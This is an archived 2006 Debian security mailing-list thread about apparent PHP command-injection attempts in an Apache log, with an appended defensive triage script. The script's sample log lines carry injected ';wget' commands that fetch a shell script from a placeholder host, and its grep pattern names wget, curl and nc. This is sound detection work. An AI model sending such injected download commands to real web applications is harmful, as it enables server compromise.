
RE: Weird message in my apache error log



I've seen this type of thing with PHP; I was going to say something but I
figured I would wait since you didn't mention it.  Can you correlate the
time/date/IP with the request from access.log?  It might give you more
information.  I can say that we get attacked regularly on Sarge and we're a
relatively high volume site with similar specs, and I've not seen
anything like this as a standard hack - my experience is that this is most
often caused by not filtering/validating forms, global PHP variables, or PHP
scripting errors.  I am very curious to know what's going on.




> -----Original Message-----
> From: Josep Serrano [mailto:mylists@montblanc.homeip.net]
> Sent: Wednesday, February 01, 2006 4:53 AM
> To: debian-security@lists.debian.org
> Subject: RE: Weird message in my apache error log
> 
> Hello guys,
> 
> No, I can't think of any specific application. Yes, this web server is
> running a couple of PHP scripts, but that's it.
> 
> Following your recommendations I have installed mod_security with the set
> of standard rules provided at www.modsecurity.org. I will be following the
> audit log for any clues.
> 
> Be sure that I have strange files, permissions, or open ports in this box.
> I run daily checks and I got the vaccines :-)
> 
> Thanks,
> Josep SERRANO.
> 
> > What does your application do? It looks like it is finding a shell
> > script somewhere?  We've seen similar things when executing CGIs and not
> > filtering the input data so well.  Lines 22 and 24 make me think there is
> > a script somewhere rather than arbitrary GET data.
> >
> >> -----Original Message-----
> >> Looks like someone is trying to do arbitrary command execution. You
> >> probably have a script somewhere that says `command $_GET['var']`, and
> >> someone is passing ';attack' as var, but it isn't quite working.
> >>
> >> I suggest using the audit log feature of mod_security, or just grepping
> >> through your access logs for anything odd ('wget' is a good search
> >> term).
> >>
> >> You might have a bot on the system, check for any odd network
> >> connections, especially to port 6667 (IRC). Also look for www-data
> >> owned files in /tmp.
> 
> 
> 
> --
> To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
> listmaster@lists.debian.org
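The triage steps suggested in this thread (grep access.log for 'wget' and shell metacharacters, correlate an error_log entry with the request that caused it by IP and time, then look for www-data owned files in /tmp and connections to port 6667) put together as one script. This is an added example, not code from the thread or from mod_security; the access log lines are constructed, the IPs are from the documentation ranges, and the correlation function assumes Apache's "combined" access log format and that error_log and access.log were written with the same clock.

```shell
#!/bin/sh
# Added triage example, not from the original thread. The log lines below
# are constructed samples in Apache "combined" format; 192.0.2.x / 10.0.0.x
# are placeholder addresses.
#
# Lines 1 and 3 are ordinary requests. Line 2 carries a ';wget ...' payload
# in the query string; line 4 carries the same thing URL-encoded
# (%3B = ';', %20 = ' '), which a plain grep for ';' would miss.
ACCESS_LOG='10.0.0.5 - - [01/Feb/2006:04:40:12 +0100] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.7 - - [01/Feb/2006:04:41:03 +0100] "GET /ping.php?host=localhost;wget%20http://192.0.2.9/x.sh HTTP/1.1" 200 312 "-" "Wget/1.10"
10.0.0.5 - - [01/Feb/2006:04:41:30 +0100] "GET /about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.7 - - [01/Feb/2006:04:42:15 +0100] "GET /ping.php?host=localhost%3Bcd%20/tmp%3Bwget%20http://192.0.2.9/x.sh HTTP/1.1" 500 0 "-" "Wget/1.10"'

# Decode the URL escapes an attacker would use to hide shell metacharacters,
# so the grep below sees ';', '|', '`', '&' and '$' as written.
urldecode() {
    sed -e 's/%3[Bb]/;/g' -e 's/%7[Cc]/|/g' -e 's/%60/`/g' \
        -e 's/%20/ /g' -e 's/%26/\&/g' -e 's/%24/$/g'
}

# Print access-log lines whose request string contains a shell
# metacharacter or a download tool name: the `command $_GET['var']` with
# var=';attack' pattern discussed in the thread. The pattern is anchored
# inside the quoted request so a User-Agent of "Wget/1.10" does not match.
suspicious_requests() {
    printf '%s\n' "$ACCESS_LOG" | urldecode \
        | grep -E '"(GET|POST) [^"]*([;|`]|\$\(|wget|curl|nc )'
}

# Correlate an error_log entry with access.log: given the client IP and
# the minute from the error line (in access.log form, e.g. 01/Feb/2006:04:41),
# show what that client requested in that minute. Assumes both logs share
# the same clock; an error_log stamp of "[Wed Feb 01 04:41:03 2006]" maps
# to "01/Feb/2006:04:41".
requests_from_ip_at() {
    ip="$1"; minute="$2"
    printf '%s\n' "$ACCESS_LOG" | grep -F "$ip - - [$minute:"
}

# Host checks from the thread. The directory and user are explicit
# arguments so the function can be pointed at a test directory.
www_data_files_in() {
    find "$1" -xdev -user "${2:-www-data}" -type f 2>/dev/null
}

# Established connections to IRC (6667). netstat needs root to show the
# owning PID; on newer systems 'ss -ntp' gives the same view.
irc_connections() {
    netstat -ntp 2>/dev/null | awk '$5 ~ /:6667$/'
}

# Usage (run as root for the last two):
#   suspicious_requests
#   requests_from_ip_at 192.0.2.7 01/Feb/2006:04:41
#   www_data_files_in /tmp www-data
#   irc_connections
```

Once the offending request is found this way, the fix belongs in the PHP script, not the log: validate the parameter against the format it must have (a hostname, a number) and pass it through escapeshellarg() before it reaches a shell, or avoid the shell call altogether.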



